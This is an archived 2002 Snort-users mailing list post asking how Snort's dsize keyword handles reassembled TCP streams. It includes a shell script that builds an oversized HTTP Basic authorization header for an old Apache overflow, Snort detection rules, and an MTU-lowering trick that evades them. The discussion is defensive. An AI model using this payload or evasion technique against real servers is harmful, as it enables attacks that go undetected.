Snort mailing list archives

Previous By Date Next
Previous By Thread Next

stream reassemble and dsize

From: Holger.Woehle () arcor net
Date: Tue, 1 Oct 2002 09:38:01 +0100
Hello,
i have a question about stream reassembling and dsize:
Am i right that dsize only looks in the current packet not in the whole
reassembled stream ?
Why i ask:
There is a exploit in an older apache called "Authorization:Basic" but this
problem belongs to all attacks dealing
with such buffer overflows like "to long url" "to long POST" a.s.o .

Sample attack:

#!/bin/sh
echo -n "GET / HTTP/1.0"
echo -n $'\n'"Authorization: Basic"
count=0
fillin=2048
while [ "$count" -lt $fillin ]
do
     echo -n "X"
     let "count+=1"
done
echo -n $'\r'$'\n'$'\r'$'\n'

piping this to netcat, snort recognises the attack with the standart rule in
web-misc.rules . This belongs to snort-1.8 and snort-1.9 .
Now the attacker sets his ethernet mtu to 100 (ifconfig eth0 mtu 100) and starts
the attack a second time.
Now snort, neither 1.8 nor 1.9 (the rules handling differs. See A+ against the
flow:established keywords) detects the scan.
snort1.8 rule : alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"WEB-MISC long basic authorization string"; flags:A+;
content:"Authorization\: Basic "; nocase; dsize:>1000; classtype:attempted-dos;
reference:bugtraq,3230; sid:1260;  rev:5;)
snort1.9 rule : alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"WEB-MISC long basic authorization string"; flow:to_server,established;
content:"Authorization\: Basic "; nocase; dsize:>1000; classtype:attempted-dos;
reference:bugtraq,3230; sid:1260;  rev:5;)
I think this is why dsize only recognizes packets with dsize under 100 in that
case .
If a set up the mtu to 1000 both snorts detect the scan.
I screwed a little with stream4 parameters but nothing helps.
How can i detect such an attack ?

with regards
Holger







-------------------------------------------------------
This sf.net email is sponsored by: DEDICATED SERVERS only $89!
Linux or FreeBSD, FREE setup, FAST network. Get your own server 
today at http://www.ServePath.com/indexfm.htm
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
Previous By Date Next
Previous By Thread Next

Current thread: